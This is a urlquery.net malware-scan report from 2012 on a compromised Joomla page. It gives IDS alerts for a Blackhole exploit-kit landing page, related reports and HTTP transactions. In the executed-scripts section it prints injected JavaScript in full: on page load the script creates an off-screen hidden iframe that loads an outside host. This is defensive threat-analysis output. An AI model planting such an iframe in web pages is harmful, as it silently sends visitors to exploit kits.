urlquery.net - Free url scanner

Overview

URL	http://11d.saenko.org.ua/index.php?option=com_registration
IP	194.28.172.70
ASN	AS42655 ON-LINE Ltd
Location	Ukraine
Report completed	2012-11-06 23:37:45 CET
Status	Loading report..
urlQuery Alerts	Detected malicious iframe injection

Settings

UserAgent	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader	8.0
Java	1.6.0_26

Intrusion Detection Systems

Suricata /w Emerging Threats Pro

No alerts detected

Snort /w Sourcefire VRT

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-06 23:37:04	194.28.172.70	urlQuery Client	1	EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch

Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 194.28.172.70

Date	Alerts / IDS	URL	IP
2013-01-14 03:37:11	1 / 4	http://www.style-s.in.ua/2008-09-23-11-24-04/31-2008-10-17-07-39-25/46-glavnaya	194.28.172.70
2012-12-30 22:48:35	1 / 5	http://www.style-s.in.ua/2008-09-23-11-24-04/31-2008-10-17-07-39-25/46-glavnaya	194.28.172.70
2012-12-30 17:30:18	1 / 8	http://www.style-s.in.ua/2008-09-23-11-24-04/31-2008-10-17-07-39-25/46-glavnaya	194.28.172.70
2012-12-26 03:39:35	1 / 8	http://www.style-s.in.ua/2008-09-23-11-24-04	194.28.172.70
2012-12-24 01:39:58	1 / 8	http://www.style-s.in.ua/contacts	194.28.172.70
2012-12-22 15:21:15	1 / 24	http://zeekcustomers.ru/	194.28.172.70

Last 6 reports on ASN: AS42655 ON-LINE Ltd

Date	Alerts / IDS	URL	IP
2013-03-21 19:13:59	0 / 2	http://www.svet999.ru/Vestnik/Vestnik.htm	195.248.234.34
2013-03-21 11:43:24	0 / 2	http://gate.eyeonarte.it/indi.php	194.28.172.77
2013-03-20 04:10:26	0 / 2	http://gate.eyeonarte.it/indi.php	194.28.172.77
2013-03-19 13:31:37	0 / 1	http://gate.eyeonarte.it/indi.php	194.28.172.77
2013-03-18 12:06:11	0 / 2	http://deshevshe.net.ua	195.248.234.124
2013-03-18 10:34:54	0 / 2	http://www.vagonka-rubas.com.ua/vagonka.html	194.28.172.77

Last 2 reports on domain: 11d.saenko.org.ua

Date	Alerts / IDS	URL	IP
2012-11-06 21:23:11	1 / 4	http://11d.saenko.org.ua/	194.28.172.70
2012-11-06 11:06:40	1 / 2	http://11d.saenko.org.ua/index.php?option=com_registration	194.28.172.70

JavaScript

Executed Scripts (17)

Executed Evals (2)

#1 JavaScript::Eval (size: 286, repeated: 1) - Alert detect on script (Severity: 2)

function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position = 'absolute';
    ifrm.style.top = '-999em';
    ifrm.style.left = '-999em';
    ifrm.src = "http://michaelmazur.net/xml.php";
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd;

#2 JavaScript::Eval (size: 3, repeated: 286)

j % 3

Executed Writes (11)

#1 JavaScript::Write (size: 9, repeated: 1)

</script>

#2 JavaScript::Write (size: 203, repeated: 1)

<frameset rows="100%,*" frameborder="no" border="0" framespacing="0"><frame name="michaelmazur.net" src="http://dsparking.com/?domainname=michaelmazur.net&a_id=48873&session_token=undefined"/></frameset>

#3 JavaScript::Write (size: 53, repeated: 1)

<meta name="description" content="michaelmazur.net">

#4 JavaScript::Write (size: 50, repeated: 1)

<meta name="keywords" content="michaelmazur.net">

#5 JavaScript::Write (size: 526, repeated: 1)

<script src="/?epl=mzzGeC1PRoes9bbFBGZFnJhGPZGGhMIpkrvYo6aEpMo45MZy6K9VnovBNu29CS1iq1RhlZxy_0hCzTaqYsq7KjEibAJvEPkAFyS7aGMi5NR78NqFkfQoy3qrZRsfXngoysEJEQIGcwHWSFB7YgrXu5-HFQYyrkFlDOBzNUtP36JBpHG6cPIZKoPjRU5SVDYxTbaBmcVtF6hWuIcfLWP1xQl6yRmslZB-U8Id2FdCMhWTIEV7DUThqdY5aA5i7ut5EqEtvMMbMUq_OjFLzGe4LK6cD_c7EZuBEGWVQdpQohgJAZ2uXNkFBcjFi0WVaDOt0kdPo6iKokySwcJs5_KWZ3hujwjkFv-KFbrApdxr-eJx1MTFy0eYXpEFrHkONAup-3PFkKGmAQ1TRvmpNDSZSgDIQKMRPQ0KmkzT1ACoBzJNRm2KfpoyeSqGGlirTQEw8P_vvwAA8P8FQABAgFscAADTqCfSWVMmWUExNmhaQukBAADw"></script>

#6 JavaScript::Write (size: 410, repeated: 1)

<script src="http://googleads.g.doubleclick.net/apps/domainpark/domainpark.cgi?callback=_google_json_callback&output=js&client=ca-dp-oversee-rs_js&domain_name=michaelmazur.net&hl=en&channel=004258&adtest=off&st=undefined&s=michaelmazur.net&kw=michael%2520kors&kw_type=broad&num_ads=0&num_radlinks=18&dt=1352241448216&u_tz=60&u_his=1&u_h=885&u_w=1176&frm=2&ref=http%3A%2F%2Fmichaelmazur.net%2Fxml.php"></script>

#7 JavaScript::Write (size: 344, repeated: 1)

<script src="http://googleads.g.doubleclick.net/apps/domainpark/domainpark.cgi?callback=_google_json_callback&output=js&client=ca-dp-oversee_ncd&domain_name=michaelmazur.net&st=create&s=michaelmazur.net&dt=1352241446337&u_tz=60&u_his=1&u_h=885&u_w=1176&frm=2&ref=http%3A%2F%2F11d.saenko.org.ua%2Findex.php%3Foption%3Dcom_registration"></script>

#8 JavaScript::Write (size: 59, repeated: 1)

<script src="http://mainrating.org/mainrating.js"></script>

#9 JavaScript::Write (size: 128, repeated: 1)

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js">

#10 JavaScript::Write (size: 138, repeated: 1)

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>

#11 JavaScript::Write (size: 32, repeated: 1)

<title>michaelmazur.net</title>

HTTP Transactions (41)

Request	Response
GET /index.php?option=com_registration HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 22:36:16 GMT Server: Apache/2 X-Powered-By: PHP/5.2.17 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 3c150ba574030fb78759fe85189b3f7b=-; path=/ Last-Modified: Tue, 06 Nov 2012 22:36:16 GMT Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Content-Length: 2386 Keep-Alive: timeout=1, max=30 Connection: Keep-Alive
GET /templates/wm_14/css/template_css.css HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/index.php?option=com_registration Cookie: 3c150ba574030fb78759fe85189b3f7b=-	HTTP/1.1 200 OK Content-Type: text/css Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:55:10 GMT Etag: "1061dbf-18b2-44dca84960780" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Content-Length: 1519 Keep-Alive: timeout=1, max=29 Connection: Keep-Alive
GET /templates/wm_14/images/spacer_01.gif HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/index.php?option=com_registration Cookie: 3c150ba574030fb78759fe85189b3f7b=-	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:55:28 GMT Etag: "10696ef-4a-44dca85a8b000" Accept-Ranges: bytes Content-Length: 74 Keep-Alive: timeout=1, max=28 Connection: Keep-Alive
GET /images/favicon.ico HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: 3c150ba574030fb78759fe85189b3f7b=-	HTTP/1.1 200 OK Content-Type: image/x-icon Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:04:58 GMT Etag: "110809b-47e-44dc9d10e8e80" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Content-Length: 663 Keep-Alive: timeout=1, max=30 Connection: Keep-Alive
GET /modules/smiletag/smiletag-script.js HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/index.php?option=com_registration Cookie: 3c150ba574030fb78759fe85189b3f7b=-	HTTP/1.1 200 OK Content-Type: application/javascript Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Sun, 22 Jul 2012 01:13:27 GMT Etag: "f98867-e9a-4c560d6231bc0" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Content-Length: 1548 Keep-Alive: timeout=1, max=30 Connection: Keep-Alive
GET /templates/wm_14/images/logo.gif HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/index.php?option=com_registration Cookie: 3c150ba574030fb78759fe85189b3f7b=-	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:55:19 GMT Etag: "10696ec-1514-44dca851f5bc0" Accept-Ranges: bytes Content-Length: 5396 Keep-Alive: timeout=1, max=30 Connection: Keep-Alive
GET /templates/wm_14/images/spacer_02.gif HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/index.php?option=com_registration Cookie: 3c150ba574030fb78759fe85189b3f7b=-	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:55:29 GMT Etag: "10696ea-4d-44dca85b7f240" Accept-Ranges: bytes Content-Length: 77 Keep-Alive: timeout=1, max=27 Connection: Keep-Alive
GET /templates/wm_14/images/spacer_03.gif HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/index.php?option=com_registration Cookie: 3c150ba574030fb78759fe85189b3f7b=-	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:55:30 GMT Etag: "10696ee-4c-44dca85c73480" Accept-Ranges: bytes Content-Length: 76 Keep-Alive: timeout=1, max=29 Connection: Keep-Alive
GET /templates/wm_14/images/spacer_04.gif HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/index.php?option=com_registration Cookie: 3c150ba574030fb78759fe85189b3f7b=-	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:55:31 GMT Etag: "10696f4-43-44dca85d676c0" Accept-Ranges: bytes Content-Length: 67 Keep-Alive: timeout=1, max=29 Connection: Keep-Alive
GET /templates/wm_14/images/bg.gif HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/templates/wm_14/css/template_css.css Cookie: 3c150ba574030fb78759fe85189b3f7b=-	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:55:14 GMT Etag: "10696e9-405-44dca84d31080" Accept-Ranges: bytes Content-Length: 1029 Keep-Alive: timeout=1, max=29 Connection: Keep-Alive
GET /modules/smiletag/view.php HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/index.php?option=com_registration Cookie: 3c150ba574030fb78759fe85189b3f7b=-	HTTP/1.1 200 OK Content-Type: text/html; charset=Win-1251 Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 X-Powered-By: PHP/5.2.17 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Tue, 06 Nov 2012 22:36:17 GMT Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Content-Length: 1166 Keep-Alive: timeout=1, max=26 Connection: Keep-Alive
GET /modules/smiletag/backend.php HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/index.php?option=com_registration Cookie: 3c150ba574030fb78759fe85189b3f7b=-; 1=1	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 X-Powered-By: PHP/5.2.17 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=d934dadc1ebcda9b87a2265004c15a95; path=/ Last-Modified: Tue, 06 Nov 2012 22:36:17 GMT Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Content-Length: 21 Keep-Alive: timeout=1, max=28 Connection: Keep-Alive
GET /modules/smiletag/smiletag-style.css HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/modules/smiletag/view.php Cookie: 3c150ba574030fb78759fe85189b3f7b=-; 1=1	HTTP/1.1 200 OK Content-Type: text/css Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:49:56 GMT Etag: "f98865-426-44dca71dec500" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Content-Length: 482 Keep-Alive: timeout=1, max=28 Connection: Keep-Alive
GET /modules/smiletag/images/avatar2.gif HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/modules/smiletag/view.php Cookie: 3c150ba574030fb78759fe85189b3f7b=-; 1=1	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:49:02 GMT Etag: "100a3b5-303-44dca6ea6cb80" Accept-Ranges: bytes Content-Length: 771 Keep-Alive: timeout=1, max=28 Connection: Keep-Alive
GET /modules/smiletag/images/avatar.gif HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/modules/smiletag/view.php Cookie: 3c150ba574030fb78759fe85189b3f7b=-; 1=1	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:49:01 GMT Etag: "100a3b2-323-44dca6e978940" Accept-Ranges: bytes Content-Length: 803 Keep-Alive: timeout=1, max=25 Connection: Keep-Alive
GET /modules/smiletag/images/smilies/smile.gif HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/modules/smiletag/view.php Cookie: 3c150ba574030fb78759fe85189b3f7b=-; 1=1	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:49:12 GMT Etag: "10123b6-437-44dca6f3f6200" Accept-Ranges: bytes Content-Length: 1079 Keep-Alive: timeout=1, max=27 Connection: Keep-Alive
GET /modules/smiletag/images/comment_header.gif HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/modules/smiletag/smiletag-style.css Cookie: 3c150ba574030fb78759fe85189b3f7b=-; 1=1; PHPSESSID=d934dadc1ebcda9b87a2265004c15a95	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:49:04 GMT Etag: "100a3b3-44c-44dca6ec55000" Accept-Ranges: bytes Content-Length: 1100 Keep-Alive: timeout=1, max=27 Connection: Keep-Alive
GET /modules/smiletag/images/comment_footer.gif HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/modules/smiletag/smiletag-style.css Cookie: 3c150ba574030fb78759fe85189b3f7b=-; 1=1; PHPSESSID=d934dadc1ebcda9b87a2265004c15a95	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:49:03 GMT Etag: "100a3b4-834-44dca6eb60dc0" Accept-Ranges: bytes Content-Length: 2100 Keep-Alive: timeout=1, max=27 Connection: Keep-Alive
GET /templates/wm_14/images/main_image.jpg HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/index.php?option=com_registration Cookie: 3c150ba574030fb78759fe85189b3f7b=-	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:55:23 GMT Etag: "10696f3-a857-44dca855c64c0" Accept-Ranges: bytes Content-Length: 43095 Keep-Alive: timeout=1, max=30 Connection: Keep-Alive
GET /images/banners/re-insur.gif HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/index.php?option=com_registration Cookie: 3c150ba574030fb78759fe85189b3f7b=-	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:17 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:04:39 GMT Etag: "110806f-fb9d-44dc9cfeca3c0" Accept-Ranges: bytes Content-Length: 64413 Keep-Alive: timeout=1, max=30 Connection: Keep-Alive
GET /favicon.ico HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: 3c150ba574030fb78759fe85189b3f7b=-; 1=1; PHPSESSID=d934dadc1ebcda9b87a2265004c15a95	HTTP/1.1 200 OK Content-Type: image/x-icon Date: Tue, 06 Nov 2012 22:36:20 GMT Server: Apache/2 Last-Modified: Thu, 22 May 2008 04:55:43 GMT Etag: "e3c23c3-47e-44dca868d91c0" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Content-Length: 663 Keep-Alive: timeout=1, max=30 Connection: Keep-Alive
GET /modules/smiletag/backend.php HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/index.php?option=com_registration Cookie: 3c150ba574030fb78759fe85189b3f7b=-; 1=1; PHPSESSID=d934dadc1ebcda9b87a2265004c15a95 If-Modified-Since: Tue, 06 Nov 2012 22:36:17 GMT	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 22:36:37 GMT Server: Apache/2 X-Powered-By: PHP/5.2.17 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Tue, 06 Nov 2012 22:36:37 GMT Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Content-Length: 21 Keep-Alive: timeout=1, max=30 Connection: Keep-Alive
GET /js/registrar.js HTTP/1.1 Host: cdn.dsultra.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://michaelmazur.net/xml.php	HTTP/1.1 200 OK Content-Type: application/x-javascript Server: Apache/2.0.52 (CentOS) Etag: "a75db-5fd-4ca16686e6840" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Cache-Control: max-age=300 nnCoection: close Age: 162 Date: Tue, 06 Nov 2012 22:37:26 GMT Last-Modified: Wed, 19 Sep 2012 23:31:37 GMT Expires: Tue, 06 Nov 2012 22:39:44 GMT Content-Length: 615 Connection: keep-alive
GET /xml.php HTTP/1.1 Host: michaelmazur.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/index.php?option=com_registration	HTTP/1.1 403 Forbidden Content-Type: text/html Date: Tue, 06 Nov 2012 22:37:25 GMT Server: Apache X-Powered-By: PHP/5.2.17 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Transfer-Encoding: chunked
GET /apps/domainpark/show_afd_ads.js HTTP/1.1 Host: pagead2.googlesyndication.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://michaelmazur.net/xml.php	HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 Last-Modified: Wed, 31 Oct 2012 23:10:23 GMT Date: Tue, 06 Nov 2012 02:06:30 GMT Expires: Wed, 07 Nov 2012 02:06:30 GMT X-Content-Type-Options: nosniff Content-Disposition: attachment Server: domainserver X-XSS-Protection: 1; mode=block Content-Encoding: gzip Content-Length: 1932 Age: 73856 Cache-Control: public, max-age=86400
